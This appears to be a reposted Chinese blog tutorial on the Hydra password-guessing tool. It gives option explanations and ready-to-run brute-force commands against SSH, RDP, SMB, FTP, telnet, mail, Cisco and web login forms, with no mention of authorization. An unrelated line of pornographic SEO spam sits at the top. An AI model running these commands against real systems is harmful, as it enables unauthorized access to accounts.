午夜视频在线网站,日韩视频精品在线,中文字幕精品一区二区三区在线,在线播放精品,1024你懂我懂的旧版人,欧美日韩一级黄色片,一区二区三区在线观看视频

分享

Hydra使用方法

 昵稱597197 2015-01-29

這個(gè)也是backtrack下面很受歡迎的一個(gè)工具

參數(shù)詳解:
-R 根據(jù)上一次進(jìn)度繼續(xù)破解
-S 使用SSL協(xié)議連接
-s 指定端口
-l 指定用戶名
-L 指定用戶名字典(文件)
-p 指定密碼破解
-P 指定密碼字典(文件)
-e 空密碼探測(cè)和指定用戶密碼探測(cè)(ns)
-C 用戶名可以用:分割(username:password)可以代替-l username -p password
-o 輸出文件
-t 指定多線程數(shù)量,默認(rèn)為16個(gè)線程
-vV 顯示詳細(xì)過程
server 目標(biāo)IP
service 指定服務(wù)名(telnet ftp pop3 mssql mysql ssh ssh2......)

使用案例:

使用hydra破解ssh的密碼
hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh

破解https:
# hydra -m /index.php -l username -P pass.txt IP https

破解teamspeak:
# hydra -l 用戶名 -P 密碼字典 -s 端口號(hào) -vV ip teamspeak

破解cisco:
# hydra -P pass.txt IP cisco
# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
破解smb:
# hydra -l administrator -P pass.txt IP smb
破解pop3:
# hydra -l muts -P pass.txt my.pop3.mail pop3
破解rdp:
# hydra IP rdp -l administrator -P pass.txt -V
破解http-proxy:
# hydra -l admin -P pass.txt http-proxy://10.36.16.18

破解telnet
# hydra IP telnet -l 用戶 -P 密碼字典 -t 32 -s 23 -e ns -f -V


破解ftp:
# hydra IP ftp -l 用戶名 -P 密碼字典 -t 線程(默認(rèn)16) -vV
# hydra IP ftp -l 用戶名 -P 密碼字典 -e ns -vV
get方式提交,破解web登錄:
  # hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns IP http-get /admin/
  # hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f IP http-get /admin/index.php
post方式提交,破解web登錄:
  該軟件的強(qiáng)大之處就在于支持多種協(xié)議的破解,同樣也支持對(duì)于web用戶界面的登錄破解,get方式提交的表單比較簡(jiǎn)單,這里通過post方式提交密碼破解提供思路。該工具有一個(gè)不好的地方就是,如果目標(biāo)網(wǎng)站登錄時(shí)候需要驗(yàn)證碼就無法破解了。帶參數(shù)破解如下:
<form action="index.php" method="POST">
<input type="text" name="name" /><BR><br>
<input type="password" name="pwd" /><br><br>
<input type="submit" name="sub" value="提交">
</form>
  假設(shè)有以上一個(gè)密碼登錄表單,我們執(zhí)行命令:
# hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”
  說明:破解的用戶名是admin,密碼字典是pass.lst,破解結(jié)果保存在ok.lst,-t 是同時(shí)線程數(shù)為1,-f 是當(dāng)破解了一個(gè)密碼就停止,ip 是本地,就是目標(biāo)ip,http-post-form表示破解是采用http 的post 方式提交的表單密碼破解。
  后面參數(shù)是網(wǎng)頁中對(duì)應(yīng)的表單字段的name 屬性,后面<title>中的內(nèi)容是表示錯(cuò)誤猜解的返回信息提示,可以自定義。





三、Syntax

# hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

-R
繼續(xù)從上一次進(jìn)度接著破解

-S
大寫,采用SSL鏈接

-s <PORT>
小寫,可通過這個(gè)參數(shù)指定非默認(rèn)端口

-l <LOGIN>
指定破解的用戶,對(duì)特定用戶破解

-L <FILE>
指定用戶名字典

-p <PASS>
小寫,指定密碼破解,少用,一般是采用密碼字典

-P <FILE>
大寫,指定密碼字典

-e <ns>
可選選項(xiàng),n:空密碼試探,s:使用指定用戶和密碼試探

-C <FILE>
使用冒號(hào)分割格式,例如“登錄名:密碼”來代替-L/-P參數(shù)

-M <FILE>
指定目標(biāo)列表文件一行一條

-o <FILE>
指定結(jié)果輸出文件

-f
在使用-M參數(shù)以后,找到第一對(duì)登錄名或者密碼的時(shí)候中止破解

-t <TASKS>
同時(shí)運(yùn)行的線程數(shù),默認(rèn)為16

-w <TIME>
設(shè)置最大超時(shí)的時(shí)間,單位秒,默認(rèn)是30s

-v / -V
顯示詳細(xì)過程

server
目標(biāo)ip

service
指定服務(wù)名,支持的服務(wù)和協(xié)議:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等

OPT
可選項(xiàng)

四、實(shí)例

1、手動(dòng)創(chuàng)建用戶名字典和密碼字典,這里只是為了演示,只加了幾個(gè)用戶名和弱口令。真正破解時(shí),需要利用密碼字典生成器生成強(qiáng)大的字典。 

2、破解ssh:

# hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.104 ssh

破解成功,直接顯示結(jié)果。

也可以使用 -o 選項(xiàng)指定結(jié)果輸出文件。

# hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh

五、其他類型密碼破解

  • 破解ftp:
# hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認(rèn)16) -vV
# hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV
  • get方式提交,破解web登錄:
  # hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /admin/
  # hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get /admin/index.php
  • post方式提交,破解web登錄:

  該軟件的強(qiáng)大之處就在于支持多種協(xié)議的破解,同樣也支持對(duì)于web用戶界面的登錄破解,get方式提交的表單比較簡(jiǎn)單,這里通過post方式提交密碼破解提供思路。該工具有一個(gè)不好的地方就是,如果目標(biāo)網(wǎng)站登錄時(shí)候需要驗(yàn)證碼就無法破解了。帶參數(shù)破解如下:

<form action="index.php" method="POST">
<input type="text" name="name" /><BR><br>
<input type="password" name="pwd" /><br><br>
<input type="submit" name="sub" value="提交">
</form>

  假設(shè)有以上一個(gè)密碼登錄表單,我們執(zhí)行命令:

# hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”

  說明:破解的用戶名是admin,密碼字典是pass.lst,破解結(jié)果保存在ok.lst,-t 是同時(shí)線程數(shù)為1,-f 是當(dāng)破解了一個(gè)密碼就停止,ip 是本地,就是目標(biāo)ip,http-post-form表示破解是采用http 的post 方式提交的表單密碼破解。

  后面參數(shù)是網(wǎng)頁中對(duì)應(yīng)的表單字段的name 屬性,后面<title>中的內(nèi)容是表示錯(cuò)誤猜解的返回信息提示,可以自定義。

  • 破解https:
# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
  • 破解teamspeak:
# hydra -l 用戶名 -P 密碼字典 -s 端口號(hào) -vV ip teamspeak
  • 破解cisco:
# hydra -P pass.txt 10.36.16.18 cisco
# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
  • 破解smb:
# hydra -l administrator -P pass.txt 10.36.16.18 smb
  • 破解pop3:
# hydra -l muts -P pass.txt my.pop3.mail pop3
  • 破解rdp:
# hydra ip rdp -l administrator -P pass.txt -V
  • 破解http-proxy:
# hydra -l admin -P pass.txt http-proxy://10.36.16.18
  • 破解imap:
# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
# hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
  • 破解telnet
# hydra ip telnet -l 用戶 -P 密碼字典 -t 32 -s 23 -e ns -f -V

六、總結(jié)

此工具強(qiáng)大之處遠(yuǎn)多于以上測(cè)試,其密碼能否破解關(guān)鍵在于強(qiáng)大的字典,對(duì)于社工型滲透來說,有時(shí)能夠得到事半功倍的效果。

    本站是提供個(gè)人知識(shí)管理的網(wǎng)絡(luò)存儲(chǔ)空間,所有內(nèi)容均由用戶發(fā)布,不代表本站觀點(diǎn)。請(qǐng)注意甄別內(nèi)容中的聯(lián)系方式、誘導(dǎo)購買等信息,謹(jǐn)防詐騙。如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請(qǐng)點(diǎn)擊一鍵舉報(bào)。
    轉(zhuǎn)藏 分享 獻(xiàn)花(0

    0條評(píng)論

    發(fā)表

    請(qǐng)遵守用戶 評(píng)論公約

    類似文章 更多